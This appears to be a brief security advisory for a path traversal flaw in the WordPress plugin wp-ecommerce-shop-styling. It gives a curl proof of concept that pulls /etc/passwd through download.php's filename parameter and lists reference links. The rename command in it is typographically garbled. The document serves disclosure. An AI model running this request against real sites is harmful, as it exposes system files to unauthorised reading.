The code in ./wp-ecommerce-shop-styling/includes/download.php does not sanitise user input to prevent sensitive system files from being downloaded. You’ll have to rename the download file via mv – -…-…-…-…-…-…-…-…-etc-passwd passwd as the filename is set to the download filename with path.
$ curl http://www.example.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd
github.com/espreto/wpsploit/blob/master/modules/auxiliary/scanner/http/wp_ecommerce_shop_styling_file_read.rb
packetstormsecurity.com/files/132594/
plugins.trac.wordpress.org/changeset/1193456/wp-ecommerce-shop-styling
vapid.dhs.org/advisory.php?v=136
wordpress.org/support/topic/wp-e-commerce-shop-styling?replies=2